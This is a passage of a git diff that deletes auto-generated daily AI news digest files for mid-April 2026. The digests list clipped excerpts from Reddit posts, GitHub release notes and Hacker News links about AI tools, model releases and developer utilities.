Score: 1.00 -Tags: api_update, mcp, cli_tool - -> I am trying to get deeper into utilizing Claude Code (trying to become more technical) as I have recently switched to the terminal and wanted some feedback on better understanding MCP vs APIs. To me it seems like APIs are direct instructions on how to navigate and pull or push data between a product and another entity. MCP on the other hand seems like it is allowing the AI to dynamically use tools and definitions based on your current context. I have heard a lot of people say that API is - ---- - -## [Built a Visual Studio Code extension to use OpenCode as a GUI sidebar instead of the terminal](https://reddit.com/r/LocalLLaMA/comments/1sml59n/built_a_visual_studio_code_extension_to_use/) -*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 -Tags: developer_tool, cli_tool - -> Hey everyone, I built a VS Code extension that brings OpenCode directly into your sidebar as a native panel, that uses the UI elements exactly as they are from the OpenCode Desktop app. No terminal needed, no browser tab. It just lives in your activity bar and works easily. What it does: * Runs OpenCode sessions inside a VS Code webview sidebar * Automatically uses whatever workspace folder you have open * Can auto-start a local OpenCode server when you open the sidebar * Keeps your session a - ---- - -## [Open Ai Agent Dashboard for Monitoring, Memory, Performance and Audit Trail](https://reddit.com/r/ChatGPT/comments/1sm2bkg/open_ai_agent_dashboard_for_monitoring_memory/) -*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Been building AI agents for about a year now and the thing that always drove me crazy is you deploy an agent, it runs for hours, and you have absolutely no idea what it did. The logs say "task complete" 47 times but did it actually do 47 different things or did it just loop the same task over and over? I had an agent burn through about $340 in API credits over a weekend because it got stuck retrying the same request. The logs showed 200 OK on every call. Everything looked fine. It just kept doi - ---- - -## [[P] Added 8 Indian languages to Chatterbox TTS via LoRA — 1.4% of parameters, no phoneme engineering [P]](https://reddit.com/r/MachineLearning/comments/1sltun8/p_added_8_indian_languages_to_chatterbox_tts_via/) -*Reddit r/MachineLearning* | 15/04/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> TL;DR: Fine-tuned Chatterbox-Multilingual (Resemble AI's open-source TTS) to support Telugu, Kannada, Bengali, Tamil, Malayalam, Marathi, Gujarati, and Hindi using LoRA adapters + tokenizer extension. Only 7.8M / 544M parameters trained. Model + audio samples available. \--- The Problem Chatterbox-Multilingual supports 23 languages with zero-shot voice cloning, but no Dravidian languages (Telugu, Kannada, Tamil, Malayalam) and limited Indo-Aryan coverage beyond Hindi. That's 500M+ speakers - ---- - -## [Claude Code on desktop, redesigned for parallel agentic work.](https://reddit.com/r/ClaudeAI/comments/1slictc/claude_code_on_desktop_redesigned_for_parallel/) -*Reddit r/ClaudeAI* | 14/04/2026 | Score: 0.99 -Tags: developer_tool, cli_tool - -> New sidebar for parallel sessions. Drag-and-drop layout. Integrated terminal. Run multiple agents from one window. New tools make it easier to complete work without leaving the app. Integrated terminal, in-app file editing, HTML + PDF preview, and a rebuilt diff viewer. Drag any panel into the layout that fits how you work. Three view modes when you want more (or less) signal. Plus more updates and customizations to fit how you work including SSH for Mac, keyboard shortcuts, and CLI plugin p - ---- - -## [I built a CLI that scans your project and auto-installs matching skills for Claude Code](https://reddit.com/r/ClaudeAI/comments/1sm4at4/i_built_a_cli_that_scans_your_project_and/) -*Reddit r/ClaudeAI* | 15/04/2026 | Score: 0.96 -Tags: developer_tool, cli_tool - -> Hey r/ClaudeAI — I built a small tool to fix something that bugged me: every time I start a new project, picking the right skills from [skills.sh](http://skills.sh) is manual and slow. skillgrab does this: 1. Scans \`package.json\`, \`requirements.txt\`, \`pubspec.yaml\`, \`go.mod\`, \`Dockerfile\`, \`vercel.json\`, etc. to detect your stack 2. Reads your README for non-code hints ("landing page", "pricing", "SEO") and asks if you want marketing/design/sales skills 3. Queries [skills.sh] - ---- - -## [Gemini CLI v0.38.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.1) -*GitHub Releases · Gemini CLI* | 15/04/2026 | Score: 0.92 -Tags: cli_tool, tool_update - -> ## What's Changed * fix(patch): cherry-pick 050c303 to release/v0.38.0-pr-25317 to patch version v0.38.0 and create version 0.38.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25466 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.0...v0.38.1 - ---- - -## [MidJourney V8.1 Alpha Has Just Been Released. How Much Improvement Does It Have?](https://reddit.com/r/midjourney/comments/1smlk07/midjourney_v81_alpha_has_just_been_released_how/) -*Reddit r/midjourney* | 15/04/2026 | Score: 1.00 -Tags: product_launch - -> A new r/midjourney version always creates excitement. Beautiful sample images start appearing everywhere, people begin testing it immediately, and the usual question follows: **Is it really better, or is it just new?** With MidJourney V8.1 Alpha now available, I wanted to look beyond the hype and test it in a more practical way. Instead of judging it in isolation, I compared it against two other strong image models available today: **Nano Banana 2** and **Grok Imagine 1.0.** The goal was sim - ---- - -## [Great news, everyone. If you were sick of the condescending 5.2 model, creators have announced 5.3, with a less preachy tone. I have tested it over the last few days and it has become more balanced.](https://reddit.com/r/ChatGPT/comments/1smkzda/great_news_everyone_if_you_were_sick_of_the/) -*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 -Tags: tool_update - -> I noticed a change from the condescending, sometimes rude and persistent looping behaviour of ChatGPT 5.2, so I asked Google about it and got this confirmation back that in March they updated to 5.3. I think I'm starting to receive that model now because it's become less preachy and isn't looping into psychoanalysis of me every time I talk to it. ChatGPT has likely felt "nicer" recently due to several updates in early 2026 designed to improve its conversational tone and reduce the rigid, robo - ---- - -## [Qwen3.5 35b is sure still one the best local model (pulling above its weight) - More Details](https://reddit.com/r/LocalLLaMA/comments/1smgqgy/qwen35_35b_is_sure_still_one_the_best_local_model/) -*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 -Tags: cli_tool - -> Last time I posted on how this model has performed in creating the webapp based on provided research paper. I got so much love to see people has appreciated the post and of-course the potential of this MOE model. I am sharing details on how I used this model to create webapp just using prompt and step by step guiding it. Later I converted my guidance steps into skills using same qwen-code cli with this model, that helped to add more examples. Here is github repo where I have added the [researc - ---- - -## [Is it possible for an open-source AI that you run at home to become as powerful as that of chatgpt and others at that level?](https://reddit.com/r/ChatGPT/comments/1smepps/is_it_possible_for_an_opensource_ai_that_you_run/) -*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 -Tags: open_source - -> What would need to be true for someone to be able to run something that powerful entirely from home? Do they just need the correct weights? Assume that they don't need to do training (maybe some tech enthusiast does the training and just hands off the built model to people). Would storage space be a constraint? How much storage would they need? And how much RAM would they need? This is all for 1 person using it, not like the person would be serving an AI service out of their garage or something - ---- - -## [Lyra 2.0 : Explorable Generative 3D Worlds](https://reddit.com/r/StableDiffusion/comments/1smbyjf/lyra_20_explorable_generative_3d_worlds/) -*Reddit r/StableDiffusion* | 15/04/2026 | Score: 1.00 -Tags: developer_tool - -> Nvidia released **Lyra 2.0**, a framework for generating persistent, explorable 3D worlds at scale, from NVIDIA Research. Generating large-scale, complex environments is difficult for AI models. Current models often “forget” what spaces look like and lose track of movement over time, causing objects to shift, blur, or appear inconsistent. This prevents them from creating the reliable 3D environments required for downstream simulations. Lyra 2.0 solves these issues by: Maintaining per- - ---- - -## [[P] Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book](https://reddit.com/r/LocalLLaMA/comments/1sm82ze/p_built_gpt2_llama_3_and_deepseek_from_scratch_in/) -*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 -Tags: open_source - -> I wrote a book that implements modern LLM architectures from scratch. The part most relevant to this sub: Chapter 3 takes GPT-2 and swaps exactly 4 things to get Llama 3.2-3B: 1. LayerNorm → RMSNorm 2. Learned positional encodings → RoPE 3. GELU → SwiGLU 4. Multi-Head Attention → Grouped-Query Attention Then loads Meta's real pretrained weights. Chapter 5 builds DeepSeek's full architecture: MLA with the absorption trick, decoupled RoPE, MoE with shared experts and fine-grained segmentation, - ---- - -## [Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book [p]](https://reddit.com/r/MachineLearning/comments/1sm75yf/built_gpt2_llama_3_and_deepseek_from_scratch_in/) -*Reddit r/MachineLearning* | 15/04/2026 | Score: 1.00 -Tags: open_source - -> I spent the past year implementing five LLM architectures from scratch in PyTorch and wrote a book documenting the process. What's covered: * Vanilla encoder-decoder transformer (English to Hindi translation) * GPT-2 (124M), loading real OpenAI pretrained weights * Llama 3.2-3B, showing the exact 4 component swaps from GPT-2 (RMSNorm, RoPE, SwiGLU, GQA), loading Meta's pretrained weights * KV cache mechanics, MQA, GQA * DeepSeek: Multi-Head Latent Attention with absorption trick and decoupled - ---- - diff --git a/data/digest-2026-04-16.md b/data/digest-2026-04-16.md deleted file mode 100644 index 7f5aad9..0000000 --- a/data/digest-2026-04-16.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-16** | 15 stories | Auto-generated from 396 archived stories - ---- - -## [Vercel CLI vercel@51.5.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.5.1) -*GitHub Releases · Vercel CLI* | 16/04/2026 | Score: 0.92 -Tags: developer_tool, cli_tool, tool_update - -> ### Patch Changes - Improve Claude Code Vercel plugin install and update prompts across CLI commands. ([#15921](https://github.com/vercel/vercel/pull/15921)) - Updated dependencies \[[`5219572d21a2ba4b49cc1c27d244c1ff5d76c591`](https://github.com/vercel/vercel/commit/5219572d21a2ba4b49cc1c27d244c1ff5d76c591), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://github.com/vercel/vercel/commit/2babfa22946d80a92f1307a8d860a9039d695b09), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://gi - ---- - -## [I got tired of copying/pasting between ChatGPT and X, so I built an extension that brings the AI directly into the timeline](https://reddit.com/r/ChatGPT/comments/1snf7bl/i_got_tired_of_copyingpasting_between_chatgpt_and/) -*Reddit r/ChatGPT* | 16/04/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I use ChatGPT to help draft posts or brainstorm replies, but the workflow of copying tweets, pasting them into ChatGPT, asking it to reply, and then pasting it back into Twitter was driving me crazy. Also, it almost always sounds like a generic robot So, I built **Tweetback**, a Chrome/Edge/Firefox extension that brings your API key directly into the X/Twitter interface. I wanted to see how far I could push the AI to actually understand context and sound human. Here is what it can do: **"Clon - ---- - -## [anyone else notice labs are getting more secretive about their best models?](https://reddit.com/r/ChatGPT/comments/1sn599k/anyone_else_notice_labs_are_getting_more/) -*Reddit r/ChatGPT* | 16/04/2026 | Score: 1.00 -Tags: product_launch, open_source - -> something shifted recently and i can't stop thinking about it. the trend used to be: new model drops, blog post goes up, everyone gets access on day one. now it feels like the most capable stuff is quietly going behind walls with "restricted access" or gated research programs, while the public-facing releases are... fine, but clearly not the frontier. google dropped gemma 4 open-weight and it's genuinely good — MoE architecture, strong reasoning, apache license. meta's doing multimodal reasonin - ---- - -## [Mozilla Announces "Thunderbolt" As An Open-Source, Enterprise AI Client](https://reddit.com/r/LocalLLaMA/comments/1sn4ibj/mozilla_announces_thunderbolt_as_an_opensource/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: product_launch, open_source - -> Reddit r/LocalLLaMA — 4 upvotes, 3 comments - ---- - -## [Qwen3.6-35B-A3B released!](https://reddit.com/r/LocalLLaMA/comments/1sn3izh/qwen3635ba3b_released/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Meet Qwen3.6-35B-A3B:Now Open-Source!🚀🚀 A sparse MoE model, 35B total params, 3B active. Apache 2.0 license. \- Agentic coding on par with models 10x its active size \- Strong multimodal perception and reasoning ability \- Multimodal thinking + non-thinking modes Efficient. Powerful. Versatile. Blog:https://qwen.ai/blog?id=qwen3.6-35b-a3b Qwen Studio:chat.qwen.ai HuggingFace:https://huggingface.co/Qwen/Qwen3.6-35B-A3B ModelScope:https://modelscope.cn/models/Qwen/Qwen3.6-35B-A3B - ---- - -## [Built a visual memory layer for Claude — see what Claude remembers about your projects (open source, free, WIP)](https://reddit.com/r/ClaudeAI/comments/1smzaxb/built_a_visual_memory_layer_for_claude_see_what/) -*Reddit r/ClaudeAI* | 16/04/2026 | Score: 1.00 -Tags: mcp, open_source - -> Claude already has memory — but it's a black box. You can't see what it knows, what decisions were made, or how your project is progressing. Dendrite makes Claude's memory visible. How it works: - Claude writes structured memory slices via MCP (decisions, observations, tasks, open questions) - You see everything in a searchable 3-pane reader - Set your own preferences that Claude pulls from on every session - Track project progress, o - ---- - -## [Built an political benchmark for LLMs. KIMI K2 can't answer about Taiwan (Obviously). GPT-5.3 refuses 100% of questions when given an opt-out. [P]](https://reddit.com/r/MachineLearning/comments/1smqsbu/built_an_political_benchmark_for_llms_kimi_k2/) -*Reddit r/MachineLearning* | 16/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> I spent the few days building a benchmark that maps where frontier LLMs fall on a 2D political compass (economic left/right + social progressive/conservative) using 98 structured questions across 14 policy areas. I tested GPT-5.3, Claude Opus 4.6, and KIMI K2. The results are interesting. **The repo is fully open-source -- run it yourself on any model with an API:** [https://github.com/dannyyaou/llm-political-eval](https://github.com/dannyyaou/llm-political-eval) **The headline finding - ---- - -## [Keycard – inject API keys into subprocesses, never touch shell env](https://www.keycard.studio/) -*Hacker News* | 16/04/2026 | Score: 0.97 -Tags: api_update, cli_tool - ---- - -## [I turned my MacBook notch into a live Claude Code dashboard](https://reddit.com/r/ClaudeAI/comments/1smm0mo/i_turned_my_macbook_notch_into_a_live_claude_code/) -*Reddit r/ClaudeAI* | 16/04/2026 | Score: 0.91 -Tags: api_update, cli_tool - -> Notch Pilot lives in the MacBook notch (no menu bar icon, no dock icon) and shows: * Live 5-hour session % + weekly limits — the exact numbers from your Claude account page, pulled from the same oauth/usage endpoint Claude Code uses. * Permission prompts rendered inline — shell commands get a code block, file edits get a red/green diff, URLs get parsed. Deny / Allow / Always allow, with "always allow" writing to \~/.claude/settings.json. * Every live session at a glance — project, model, uptime - ---- - -## [OpenClaw v2026.4.15 released](https://github.com/openclaw/openclaw/releases/tag/v2026.4.15) -*GitHub Releases · OpenClaw* | 16/04/2026 | Score: 0.84 -Tags: developer_tool, cli_tool - -> ### Changes - Anthropic/models: default Anthropic selections, `opus` aliases, Claude CLI defaults, and bundled image understanding to Claude Opus 4.7. - Google/TTS: add Gemini text-to-speech support to the bundled `google` plugin, including provider registration, voice selection, WAV reply output, PCM telephony output, and setup/docs guidance. (#67515) Thanks @barronlroth. ### Fixes - Agents/skills: sort prompt-facing `available_skills` entries by skill name after merging sources so `skills. - ---- - -## [Crush v0.59.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.59.0) -*GitHub Releases · Crush* | 16/04/2026 | Score: 0.84 -Tags: cli_tool, tool_update - -> ## Changelog ### New! * 3773b23cb44afc4567d892f01c41c8dc62556ca0: feat(shell): add jq as a bash builtin + a jq skill for it (@meowgorithm) * b37649e45299d426aeae73a54efc0d1155fb5c91: feat(ui): add skills discovery status to sidebar and landing page (#2384) (@huaiyuWangh) * e8f5e2025d2401ffe06123c42226f3b7a20abe3a: feat: show progress bar on rio terminal (#2624) (@andreynering) ### Fixed * f546a071891c4ced02c832ff1789534df2874bda: fix(prompt): remind coder to follow `` format on comm - ---- - -## [Qwen3.6-35B is worse at tool use and reasoning loops than 3.5?](https://reddit.com/r/LocalLLaMA/comments/1sni4c1/qwen3635b_is_worse_at_tool_use_and_reasoning/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: api_update - -> Been running the new model entire evening in different quants and coding tasks with OpenCode. Used oMLX and LM Studio. Used recommended settings for precise tasks (temp 0.6, top-k 20, etc) and OpenCode agent. So far my findings is that the model goes into infinite reasoning loops more often than 3.5, and I sometimes see failed tool calls. The latter could be parser bugs, but the former is the model itself. It’s ok on basic apps, but really struggles to move ahead on something more complex like - ---- - -## [PSA: Qwen3.6 ships with preserve_thinking. Make sure you have it on.](https://reddit.com/r/LocalLLaMA/comments/1sne4gh/psa_qwen36_ships_with_preserve_thinking_make_sure/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: tool_update - -> I had previously posted [here about a fix to their 3.5 template ](https://www.reddit.com/r/LocalLLaMA/comments/1sg076h/i_tracked_a_major_cache_reuse_issue_down_to_qwen/)to help resolve the KV cache invalidation issue from their template. A lot of you found it useful. Qwen 3.6 now addresses this with a new preserve\_thinking flag. From their [model page:](https://huggingface.co/Qwen/Qwen3.6-35B-A3B) >`please use "preserve_thinking": True instead of "chat_template_kwargs": {"preserve_thinking - ---- - -## [Google, please just open source Imagen (2022), Gemini 1.0 Nano and Gemini 1.0 Pro. You have nothing to lose at this point.](https://reddit.com/r/LocalLLaMA/comments/1sncslc/google_please_just_open_source_imagen_2022_gemini/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: open_source - -> Ok, so imagen (the original one from 2022, not imagen 3/4) should be open source. The gemini 1.0 nano model and the gemini 1.0 pro models should be open source. xAI already open-sourced grok 1, but Google???????? at this point you should open source this Google if you seeing this (prob. not) please open source it in I/O 2026 Edit: please open source also palm 2 unicorn and bison, geminii 3.1 destroys it - ---- - -## [Replaced an LLM's text generation head with one that emits raw machine opcodes. Here are my findings](https://reddit.com/r/LocalLLaMA/comments/1snbyh8/replaced_an_llms_text_generation_head_with_one/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: agent_tool - -> Follow-up to [my previous post](https://www.reddit.com/r/LocalLLaMA/comments/1sm076z/i_cant_stop_thinking_about_this_why_are_we_making/) about why AI agents should not control machines through text. The idea: every AI agent today generates human text, parses it, then executes it. That's like controlling a robot arm by dictating English. Tesla FSD replaced that pattern. Cameras go in, steering commands come out, no text in between. Can we do the same for software? Skip the text, emit machine ins - ---- - diff --git a/data/digest-2026-04-17.md b/data/digest-2026-04-17.md deleted file mode 100644 index b4320b3..0000000 --- a/data/digest-2026-04-17.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-17** | 15 stories | Auto-generated from 370 archived stories - ---- - -## [Crush v0.60.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.60.0) -*GitHub Releases · Crush* | 17/04/2026 | Score: 1.00 -Tags: api_update, product_launch, tool_update - -> # Secret release You're not supposed to read through the changelog below. ## Changelog ### New! * ea86101bf6c61ee05ca3e887ea65d2f5ff9e68d7: feat(hyper): use openai-compatible endpoint for hyper (#2640) (@andreynering) ---
          Verifying the artifacts First, download the [`checksums.txt` file](https://github.com/charmbracelet/crush/releases/download/v0.60.0/checksums.txt) and the [`checksums.txt.sigstore.json` file](https://github.com/charmbracelet/crush/ - ---- - -## [Adapt: open-source memory that rewrites its own structure when your data surprises it](https://reddit.com/r/LocalLLaMA/comments/1so002u/adapt_opensource_memory_that_rewrites_its_own/) -*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> TypeScript library I've been building. The thing I want feedback on: when the memory keeps dismissing data it shouldn't, or queries keep coming back empty, it restructures itself;splits overloaded learners, merges redundant ones, grows new ones for domains nobody configured. Works with any Vercel AI SDK provider, so Ollama / LM Studio / llama.cpp plus hosted. Observe and synthesize are separate LLM calls, so you can run a 7B for observe (the high-volume path) and a bigger model for s - ---- - -## [Anthropic's AI protocol has critical flaw affecting 200,000 servers](https://reddit.com/r/ClaudeAI/comments/1snx2nw/anthropics_ai_protocol_has_critical_flaw/) -*Reddit r/ClaudeAI* | 17/04/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> https://www.infosecurity-magazine.com/news/systemic-flaw-mcp-expose-150/ Security researchers at OX Security disclosed on Tuesday what they describe as a critical, systemic vulnerability in Anthropic's Model Context Protocol, an open-source standard that allows AI models to connect to external data sources and systems. The flaw could enable arbitrary command execution on any vulnerable system, potentially exposing sensitive user data, internal databases, API keys, and chat histories across more - ---- - -## [OpenAI Codex Just Got Its Biggest Update Yet](https://reddit.com/r/ChatGPT/comments/1sno26n/openai_codex_just_got_its_biggest_update_yet/) -*Reddit r/ChatGPT* | 17/04/2026 | Score: 1.00 -Tags: developer_tool, cli_tool, agent_tool - -> OpenAI says Codex now works in the app, IDE, terminal, web, GitHub, iOS, and Slack. Recent upgrades bundled a new GPT-5.3-Codex model for agentic coding, a rebuilt CLI, an IDE extension for VS Code-compatible editors, faster cloud task performance via container caching, automated code review, an in-app browser for rendered pages, and computer use for macOS apps. April 2026 added three more shifts: a token-based credit billing model, a new $100 Pro tier with up to 10x Plus usage, and - ---- - -## [[Resource] Anima Style Explorer: A free web tool for ComfyUI styles + Open Source MooshieUI Desktop Client](https://reddit.com/r/StableDiffusion/comments/1snkume/resource_anima_style_explorer_a_free_web_tool_for/) -*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 -Tags: open_source, tool_update - -> I wanted to share a project I have been building for the community called Anima. It is a completely free web-based style explorer designed to help you discover and visualize different aesthetic prompts and configurations for your Stable Diffusion generations without guesswork. Web Version: [https://anima.mooshieblob.com/](https://anima.mooshieblob.com/) **MooshieUI Integration (Open Source)** For those who prefer a local workflow, I have also integrated this into MooshieUI. This is a custom, - ---- - -## [How to Implement Karpathy's LLM Knowledge Base. Full Guide](https://reddit.com/r/ChatGPT/comments/1so334n/how_to_implement_karpathys_llm_knowledge_base/) -*Reddit r/ChatGPT* | 17/04/2026 | Score: 0.98 -Tags: api_update, developer_tool - -> karpathy introduced his LLM Knowledge base Wiki last week. We've been quietly doing a version of this for months at our Org, but his write-up made me realize how much further you can take it with the right setup. **the core idea**: using LLM to compile and maintain knowledge. **you feed source documents** \- articles, papers, sdk references, repos into a raw directory. the model incrementally builds a wiki from them. markdown files, summaries, backlinks, categorized by concept. the llm writes - ---- - -## [Gemini CLI v0.38.2 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.2) -*GitHub Releases · Gemini CLI* | 17/04/2026 | Score: 0.92 -Tags: cli_tool, tool_update - -> ## What's Changed * fix(patch): cherry-pick 14b2f35 to release/v0.38.1-pr-24974 to patch version v0.38.1 and create version 0.38.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25585 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.1...v0.38.2 - ---- - -## [Vercel CLI vercel@51.7.0 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.7.0) -*GitHub Releases · Vercel CLI* | 17/04/2026 | Score: 0.84 -Tags: api_update, cli_tool - -> ### Minor Changes - [detect-services] If a vercel.toml exists, update the vercel.toml ([#15895](https://github.com/vercel/vercel/pull/15895)) - Use correct filename in messages when config file is not vercel.json ([#15893](https://github.com/vercel/vercel/pull/15893)) - [services] move Python workers to v2beta triggers with private routing ([#15920](https://github.com/vercel/vercel/pull/15920)) ### Patch Changes - Include `action` and `resource` fields from API 403 responses in non- - ---- - -## [Vercel CLI vercel@51.6.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.6.1) -*GitHub Releases · Vercel CLI* | 17/04/2026 | Score: 0.84 -Tags: cli_tool, tool_update - -> ### Patch Changes - Updated dependencies \[[`055f6239a4fe763b9f3b33cfbb5baa2e0e214767`](https://github.com/vercel/vercel/commit/055f6239a4fe763b9f3b33cfbb5baa2e0e214767)]: - @vercel/build-utils@13.18.0 - @vercel/backends@0.1.0 - @vercel/python@6.34.0 - @vercel/elysia@0.1.68 - @vercel/express@0.1.78 - @vercel/fastify@0.1.71 - @vercel/go@3.5.0 - @vercel/h3@0.1.77 - @vercel/hono@0.2.71 - @vercel/hydrogen@1.3.6 - @vercel/koa@0.1.51 - ---- - -## [CadQuery is an open-source Python library for building 3D CAD models](https://cadquery.github.io/) -*Hacker News* | 15/04/2026 | Score: 0.84 -Tags: open_source, developer_tool - ---- - -## [Qwen3.6 GGUF is so good for debugging.](https://reddit.com/r/LocalLLaMA/comments/1sofcqv/qwen36_gguf_is_so_good_for_debugging/) -*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 -Tags: api_update - -> using unsloth dynamic quant on 16GB vram + 32GB dram. 200k q8\_0 kv cache (context window) - ---- - -## [Intel Arc Pro B70 Open-Source Linux Performance Against NVIDIA RTX & AMD Radeon AI PRO Review](https://reddit.com/r/LocalLLaMA/comments/1soe0nm/intel_arc_pro_b70_opensource_linux_performance/) -*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 -Tags: open_source - -> The R9700 is about 30% more than the B70, but it's more than 30% better. Overall, I rather have a R9700 than a B70. - ---- - -## [Trying to Run LTX2.3 locally but getting an error](https://reddit.com/r/StableDiffusion/comments/1sodw5o/trying_to_run_ltx23_locally_but_getting_an_error/) -*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 -Tags: api_update - -> I'm pretty new to all of this, but I thought that the cool thing about LTX 2.3 was that you are able to do image and video generation locally on your own hardware. But it's still connected to the API key that I created which makes it think I'm still trying to use it through the cloud. I tried switching the model to something that would make it generate locally but I guess that wasn't the solution? It was a 25 GB download so I thought that was the answer but now I'm stumped. Can someone explain h - ---- - -## [Claude Design just launched and Figma dropped 4.26% in a single day, we are witnessing history in real time](https://reddit.com/r/ClaudeAI/comments/1so6z2t/claude_design_just_launched_and_figma_dropped_426/) -*Reddit r/ClaudeAI* | 17/04/2026 | Score: 1.00 -Tags: tool_update - -> I genuinely cannot believe what I'm watching unfold today Anthropic dropped Claude Design this morning , a tool that lets anyone describe what they want and get back a full website, landing page, or presentation. No design skills needed and No Figma subscription. Just... talk to it And the market reacted instantly. Figma stock is down $0.86 (4.26%) today alone. Adobe, Wix, GoDaddy all bled too. Anthropic's own CPO literally resigned from Figma's board three days ago. The writing was on the wal - ---- - -## [Fastest image to image model](https://reddit.com/r/StableDiffusion/comments/1so6um1/fastest_image_to_image_model/) -*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 -Tags: api_update - -> Does anybody know a platform that can deliver **image-to-image** responses in their **API** in less than **7** seconds? I already tried **Nano Banana**, but it takes about **16** seconds or more. - ---- - diff --git a/data/digest-2026-04-18.md b/data/digest-2026-04-18.md deleted file mode 100644 index 9c2b33f..0000000 --- a/data/digest-2026-04-18.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-18** | 15 stories | Auto-generated from 256 archived stories - ---- - -## [[Update] GHOST v2.1: Full Native Windows Support is Live.](https://reddit.com/r/LocalLLaMA/comments/1sp7yhz/update_ghost_v21_full_native_windows_support_is/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> FOR THE UNINITIATED: GHOST is an open source environment manager that breaks the NVIDIA monopoly. It allows you to run high performance AI models on AMD hardware by automatically injecting ZLUDA and ROCm layers into your Windows environment. No Linux, no complex WSL2 setups, and no driver hacking required. KEY FEATURES Full Windows Native Support: Runs directly in PowerShell with a hardened virtualization layer. Auto Hardware Mapping: Scans your system and spoofs the exact RDNA architecture - ---- - -## [easyaligner: Forced alignment with GPU acceleration and flexible text normalization (compatible with all w2v2 models on HF Hub) [P]](https://reddit.com/r/MachineLearning/comments/1soyqfw/easyaligner_forced_alignment_with_gpu/) -*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> https://preview.redd.it/f4d5krhkjyvg1.png?width=1020&format=png&auto=webp&s=11310f377b22abbe3dd110cc7d362ba8aae35f8d I have built [`easyaligner`](https://kb-labb.github.io/easyaligner/), a forced alignment library designed to be performant and easy to use. Having worked with preprocessing hundreds of thousands of hours of audio and text for training speech-to-text models, I found that the available open source forced alignment libraries often missed some convenience features. For o - ---- - -## [We’re proud to open-source LIDARLearn [R] [D] [P]](https://reddit.com/r/MachineLearning/comments/1sou5u1/were_proud_to_opensource_lidarlearn_r_d_p/) -*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> It’s a unified PyTorch library for 3D point cloud deep learning. To our knowledge, it’s the first framework that supports such a large collection of models in one place, with built-in cross-validation support. It brings together 56 ready-to-use configurations covering supervised, self-supervised, and parameter-efficient fine-tuning methods. You can run everything from a single YAML file with one simple command. One of the best features: after training, you can automatically generate a publica - ---- - -## [Qwen 3.6 vs 6 other models across 5 agent frameworks on M3 Ultra](https://reddit.com/r/LocalLLaMA/comments/1sojag2/qwen_36_vs_6_other_models_across_5_agent/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I benchmarked Qwen 3.6, Qwen 3.5, and 5 other models across 5 agent frameworks on Apple Silicon — here's the full compatibility matrix **Hardware:** Apple M3 Ultra, 256GB unified memory **Frameworks tested:** Hermes Agent (64K stars), PydanticAI, LangChain, smolagents (HuggingFace), OpenClaude/Anthropic SDK **Models tested:** Qwen 3.6 35B (brand new), Qwen 3.5 35B, Qwopus 27B, Qwen 3.5 27B, Llama 3.3 70B, DeepSeek-R1 32B, Gemma 4 26B # The Agent Compatibility Matrix This is the part I wish - ---- - -## [gpt can now control your entire computer like a humain](https://reddit.com/r/ChatGPT/comments/1soht46/gpt_can_now_control_your_entire_computer_like_a/) -*Reddit r/ChatGPT* | 18/04/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> Hey everyone, I built something called AriaOS and just open-sourced it. The idea is simple: instead of running an agent in a terminal session that only sees text, I gave it its own isolated Debian VM with computer use. It can see the screen, move the mouse, click, type, scroll, open apps, work with files, and operate inside a contained environment. What made the project interesting is that: I didn’t want to rely only on visual automation. I built a hybrid system that combines high-speed local - ---- - -## [ChatGPT kept hallucinating my Factorio bottlenecks. So I built an MCP that reads your saves.](https://reddit.com/r/ChatGPT/comments/1sp7824/chatgpt_kept_hallucinating_my_factorio/) -*Reddit r/ChatGPT* | 18/04/2026 | Score: 0.94 -Tags: mcp, open_source - -> You've probably asked ChatGPT a 